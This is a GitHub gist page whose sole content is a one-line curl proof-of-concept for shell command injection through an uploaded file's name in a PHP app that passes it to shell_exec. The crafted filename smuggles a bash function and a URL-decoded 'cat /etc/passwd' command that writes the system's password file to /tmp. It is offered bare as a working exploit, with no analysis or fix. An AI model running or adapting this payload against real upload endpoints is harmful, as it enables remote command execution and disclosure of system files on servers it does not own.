santaklouse/gist:cb6af87a5e6e67734f1c7c4c696a2b99

Created May 15, 2019 12:47

Star (0) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Select an option

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/santaklouse/cb6af87a5e6e67734f1c7c4c696a2b99.js"></script>
Save santaklouse/cb6af87a5e6e67734f1c7c4c696a2b99 to your computer and use it in GitHub Desktop.

Download ZIP

PHP shell command injection tru upload file filename used in shell_exec

Raw

gistfile1.txt

curl -F 'language=en' -F 'type=email' -F "[email protected]; filename=\"||test(){ $(echo $1 | python -c 'import sys, urllib as ul; print ul.unquote(sys.stdin.read())') ; };test cat%20%2fetc%2fpasswd > /tmp/1 ;.mp3\"" --compressed 'http://localhost/upload_file'

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment